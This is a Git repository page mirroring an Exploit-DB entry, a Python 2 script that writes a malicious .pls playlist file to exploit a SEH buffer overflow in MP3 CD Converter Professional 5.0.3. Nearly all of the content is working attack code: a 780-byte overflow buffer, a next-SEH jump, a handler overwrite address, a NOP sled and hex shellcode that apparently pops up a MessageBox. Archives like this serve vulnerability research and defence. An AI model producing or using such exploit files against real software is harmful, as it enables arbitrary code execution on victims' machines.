bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/15785.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

82 lines
No EOL
2.6 KiB
Python
Executable file
Raw Permalink Blame History

#!/usr/bin/python
#
#
#Python File Created BY C4SS!0 G0MES
#http://www.invasao.com.br
#Louredo_@hotmail.com
#
#
#[+]Exploit Titule: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)
#[+]Date: 12/20/2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
#[+]Version: 5.0.3
#[+]Tested On: WIN-XP SP3 Virtual Box
#[+]CVE: N/A
#
#
#
import os
import sys
import struct
import time
def usage():
os.system("cls")
os.system("color 4f")
print("\n"
"=====================================================================\n"
"|| ||\n"
"|| Exploit Buffer Overflow MP3 CD Converter Professional(SEH) ||\n"
"|| Author C4SS!0 G0M3S ||\n||"
" ||\n"
"=====================================================================\n\n")
print("[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)")
print("[+]Date: 12/20/2010")
print("[+]Author: C4SS!0 G0M3S")
print("[+]E-mail: Louredo_@hotmail.com")
print("[+]Home: http://www.invasao.com.br")
print("[+]Impact: Hich")
print("[+]Version: 5.0.3")
print("[+]Country: Brazil\n")
if len(sys.argv) !=2:
usage()
print "[-]Usage: "+sys.argv[0]+" <File Name>"
print "[-]Exemple: "+sys.argv[0]+" Exploit.pls"
sys.exit(0)
buffer = "\x41" * 780
nseh = "\xeb\x0d\x90\x90" #JMP SHORT 14
seh = struct.pack('<L',0x0077cebf)
nops = "\x90" * 10
usage()
print "[*]Identifying the length Shellcode"
time.sleep(1)
shellcode = ("\x33\xC0\x33\xC9\x33\xD2\x33\xDB\x50\x68\x6C\x6C\x20\x20\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x54\x58\xBB\x7B\x1D\x80\x7C\x50"
"\xFF\xD3\x90\x33\xD2\x52\xB9\x5E\x67\x30\xEF\x81\xC1\x11\x11\x11\x11\x51\x68\x61\x67\x65\x42\x68\x4D\x65\x73\x73\x54\x5A\x52\x50"
"\xB9\x30\xAE\x80\x7C\xFF\xD1\x33\xC9\x33\xD2\x33\xDB\x51\x68\x53\x20\x20\x20\x68\x47\x30\x4D\x33\x68\x53\x21\x30\x20\x68\x20\x43"
"\x34\x53\x68\x64\x20\x42\x79\x68\x6F\x69\x74\x65\x68\x45\x78\x70\x6C\x54\x59\x53\x68\x21\x30\x20\x20\x68\x43\x34\x53\x53\x54\x5B"
"\x6A\x40\x53\x51\x52\xFF\xD0\x33\xC0\x50\xBE\xFA\xCA\x81\x7C\xFF\xD6")
print "[*]The length is Shellcode:"+str(len(shellcode))
time.sleep(1)
payload = str(buffer+nseh+seh+nops+shellcode)
print "[*]Creating the Archive "+sys.argv[1]
time.sleep(1)
file = sys.argv[1]
try:
f=open(file,"w")
f.write(payload)
f.close()
print "[*]The Archive was created "+str(file)+" Success"
time.sleep(1)
except:
print "[-]Error Creating File "+file
Reference in a new issue View git blame Copy permalink